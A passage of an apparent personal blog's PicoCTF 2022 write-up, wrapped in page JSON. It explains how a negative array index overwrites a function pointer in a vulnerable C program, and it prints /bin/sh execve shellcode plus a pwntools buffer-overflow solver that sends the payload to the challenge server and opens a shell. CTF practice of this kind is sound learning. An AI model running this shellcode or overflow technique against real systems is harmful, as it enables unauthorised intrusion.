punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    score <span class=\"token operator\">+=</span> story<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token keyword\">return</span> score<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">easy_checker</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">,</span> len<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>FLAGSIZE<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    FILE <span class=\"token operator\">*</span>f <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>f <span class=\"token operator\">==</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s %s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Please create 'flag.txt' in this directory with your\"</span><span class=\"token punctuation\">,</span>\n                      <span class=\"token string\">\"own debugging flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> FLAGSIZE<span class=\"token punctuation\">,</span> f<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// size bound read</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You're 1337. Here's the flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">else</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You've failed this class.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">hard_checker</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">,</span> len<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">13371337</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span>FLAGSIZE<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    FILE <span class=\"token operator\">*</span>f <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>f <span class=\"token operator\">==</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n      <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s %s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Please create 'flag.txt' in this directory with your\"</span><span class=\"token punctuation\">,</span>\n                      <span class=\"token string\">\"own debugging flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> FLAGSIZE<span class=\"token punctuation\">,</span> f<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// size bound read</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You're 13371337. Here's the flag.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">else</span>\n  <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"You've failed this class.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>check<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=</span> hard_checker<span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">int</span> fun<span class=\"token punctuation\">[</span><span class=\"token number\">10</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">vuln</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> story<span class=\"token punctuation\">[</span><span class=\"token number\">128</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> num1<span class=\"token punctuation\">,</span> num2<span class=\"token punctuation\">;</span>\n\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Tell me a story and then I'll tell you if you're a 1337 >> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%127s\"</span><span class=\"token punctuation\">,</span> story<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"On a totally unrelated note, give me two numbers. Keep the first one less than 10.\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d %d\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>num1<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>num2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>num1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">10</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    fun<span class=\"token punctuation\">[</span>num1<span class=\"token punctuation\">]</span> <span class=\"token operator\">+=</span> num2<span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token function\">check</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">,</span> <span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>story<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n \n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token operator\">*</span>argv<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token comment\">// Set the gid to the effective gid</span>\n  <span class=\"token comment\">// this prevents /bin/sh from dropping the privileges</span>\n  <span class=\"token class-name\">gid_t</span> gid <span class=\"token operator\">=</span> <span class=\"token function\">getegid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setresgid</span><span class=\"token punctuation\">(</span>gid<span class=\"token punctuation\">,</span> gid<span class=\"token punctuation\">,</span> gid<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">vuln</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>When you run it normally, <code class=\"language-text\">vuln</code> calls the function <code class=\"language-text\">check</code>.</p>\n<p>As shown by <code class=\"language-text\">void (*check)(char*, size_t) = hard_checker;</code>, this <code class=\"language-text\">check</code> variable stores a pointer to the <code class=\"language-text\">hard_checker</code> function.</p>\n<p>At a high level, the route to the flag was to rewrite this function address to the address of <code class=\"language-text\">easy_checker</code>, then find an input that satisfies <code class=\"language-text\">calculate_story_score(story, len) == 1337</code>.</p>\n<p>Here, instead of overwriting the function address directly, I abused the following code to perform a relative address overwrite.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>num1 <span class=\"token operator\">&lt;</span> <span class=\"token number\">10</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    fun<span class=\"token punctuation\">[</span>num1<span class=\"token punctuation\">]</span> <span class=\"token operator\">+=</span> num2<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Specifically, by making the second input <code class=\"language-text\">-16 -314</code>, you can subtract <code class=\"language-text\">314</code> from the value at the address located 16 bytes before the start of the <code class=\"language-text\">fun</code> array.</p>\n<p>As a result, the value of <code class=\"language-text\">check</code>, which originally stored the address of the <code class=\"language-text\">hard_checker</code> function, is overwritten with <code class=\"language-text\">hard_checker</code>’s address minus 314, causing it to point to the address of <code class=\"language-text\">easy_checker</code>.</p>\n<p>Then I searched for an input of at most 127 characters whose calculation result below becomes 1337. The first input turned out to be <code class=\"language-text\">aaaaaaaaaaaaaL</code>, which let me get the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> <span class=\"token function\">calculate_story_score</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>story<span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> len<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> score <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token class-name\">size_t</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> len<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span>\n  <span class=\"token punctuation\">{</span>\n    score <span class=\"token operator\">+=</span> story<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n\n  <span class=\"token keyword\">return</span> score<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<h3 id=\"ropfupwn\" style=\"position:relative;\"><a href=\"#ropfupwn\" aria-label=\"ropfupwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>ropfu(Pwn)</h3>\n<blockquote>\n<h4 id=\"description-4\" style=\"position:relative;\"><a href=\"#description-4\" aria-label=\"description 4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Description</h4>\n<p>What’s ROP?</p>\n</blockquote>\n<p>It was an introductory ROP problem.</p>\n<p>For starters, running <code class=\"language-text\">objdump</code> shows that the stack region has execute permission.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ objdump -x vuln\nvuln:     <span class=\"token function\">file</span> <span class=\"token function\">format</span> elf32-i386\nvuln\narchitecture: i386, flags 0x00000112:\nEXEC_P, HAS_SYMS, D_PAGED\nstart address 0x08049c20\n\nProgram Header:\n    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align <span class=\"token number\">2</span>**12\n         filesz 0x000001e8 memsz 0x000001e8 flags r--\n    LOAD off    0x00001000 vaddr 0x08049000 paddr 0x08049000 align <span class=\"token number\">2</span>**12\n         filesz 0x0006a960 memsz 0x0006a960 flags r-x\n    LOAD off    0x0006c000 vaddr 0x080b4000 paddr 0x080b4000 align <span class=\"token number\">2</span>**12\n         filesz 0x0002e42d memsz 0x0002e42d flags r--\n    LOAD off    0x0009a6a0 vaddr 0x080e36a0 paddr 0x080e36a0 align <span class=\"token number\">2</span>**12\n         filesz 0x00002c18 memsz 0x00003950 flags rw-\n    NOTE off    0x00000134 vaddr 0x08048134 paddr 0x08048134 align <span class=\"token number\">2</span>**2\n         filesz 0x00000044 memsz 0x00000044 flags r--\n     TLS off    0x0009a6a0 vaddr 0x080e36a0 paddr 0x080e36a0 align <span class=\"token number\">2</span>**2\n         filesz 0x00000010 memsz 0x00000030 flags r--\n   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align <span class=\"token number\">2</span>**4\n         filesz 0x00000000 memsz 0x00000000 flags rwx\n   RELRO off    0x0009a6a0 vaddr 0x080e36a0 paddr 0x080e36a0 align <span class=\"token number\">2</span>**0\n         filesz 0x00001960 memsz 0x00001960 flags r--</code></pre></div>\n<p>The stack region that could be overwritten via the buffer overflow was 28 bytes, so I wrote shellcode that would spawn a shell within that space.</p>\n<p>The shellcode could be written in the following assembly.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token punctuation\">;</span> binsh2<span class=\"token punctuation\">.</span>s\nBITS <span class=\"token number\">32</span>\nglobal _start\n \n_start<span class=\"token operator\">:</span>\n    mov eax<span class=\"token punctuation\">,</span> <span class=\"token number\">11</span>\n    jmp buf\nsetebx<span class=\"token operator\">:</span>\n    pop ebx\n    xor ecx<span class=\"token punctuation\">,</span> ecx\n    xor edx<span class=\"token punctuation\">,</span> edx\n    <span class=\"token keyword\">int</span> <span class=\"token number\">0x80</span>\nbuf<span class=\"token operator\">:</span>\n    call setebx\n    db <span class=\"token char\">'/bin/sh'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span></code></pre></div>\n<p>This calls <code class=\"language-text\">execve</code> on x86.</p>\n<p>See the following for more details.</p>\n<p>Reference: <a href=\"https://inaz2.hatenablog.com/entry/2014/03/13/013056\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Writing shellcode for Linux x86 - Momoiro Technology</a></p>\n<p>Reference: <a href=\"https://book.mynavi.jp/manatee/detail/id=64562\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What Is Shellcode? | Tech Book Zone Manatee</a></p>\n<p>After embedding this shellcode on the stack, I thought it would be enough to place a <code class=\"language-text\">ret rsp</code> gadget in the return address, but I could not find such a gadget.</p>\n<p>So instead, I searched for a <code class=\"language-text\">jmp eax</code> gadget and used that address, which let me get the flag.</p>\n<p>The final solver is below.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> binascii\n<span class=\"token keyword\">import</span> time\n\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"./vuln\"</span><span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> elf\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"shellcode\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    payload <span class=\"token operator\">=</span> f<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"\\x90\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">28</span><span class=\"token operator\">-</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\nret <span class=\"token operator\">=</span> p32<span class=\"token punctuation\">(</span><span class=\"token number\">0x0805334b</span><span class=\"token punctuation\">)</span> <span class=\"token comment\"># jmp eax</span>\npayload <span class=\"token operator\">+=</span> ret\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"shellcode\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Local</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./vuln\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Remote</span>\np <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"saturn.picoctf.net\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">59222</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>That was a rough writeup.</p>\n<p>I could not clear all of the Pwn challenges, so I need more practice.</p>","fields":{"slug":"/ctf-picoctf-2022-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2022-03-30","description":"","tags":["Rev (en)","Pwn (en)","Forensic (en)","English"],"title":"PicoCTF 2022 Writeup","socialImage":{"publicURL":"/static/43b63a7448b0fa40e9aeb9f982151bfd/ctf-picoctf-2022.png"}}}},"pageContext":{"slug":"/ctf-picoctf-2022-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}